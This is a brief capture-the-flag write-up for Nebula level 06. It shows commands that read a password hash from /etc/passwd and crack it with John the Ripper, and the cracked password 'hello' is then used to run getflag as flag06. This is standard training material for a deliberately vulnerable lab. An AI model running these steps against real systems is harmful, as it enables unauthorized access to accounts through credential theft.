The flag06 account credentials came from a legacy unix system.This probably means that the password hash is stored in the /etc/passwd file (as opposed to /etc/shadow, only readable by root). This is also where it used to be stored in the old days (before ~1988, see http://en.wikipedia.org/wiki/Shadow_password#History).
Let's verify that.
level06@nebula:~$ grep flag06 /etc/passwd flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/shTurns out our assumptions were correct. Let's pass the /etc/passwd file to John The Ripper (a famous
level06@nebula:~$ john /etc/passwd Created directory: /home/level06/.john Loaded 1 password hash (Traditional DES [128/128 BS SSE2]) hello (flag06) guesses: 1 time: 0:00:00:00 100% (2) c/s: 9412 trying: 12345 - biteme Use the "--show" option to display all of the cracked passwords reliablyAlmost instantly, john pops out the password corresponding to flag06's hash ("hello")! We use our newly acquired knowledge to log in as flag06 and actually get the flag:
level06@nebula:~$ su flag06 -c getflag Password: You have successfully executed getflag on a target accountThat was quick. Keep this up and you'll become a digital dragon slayer in no time :)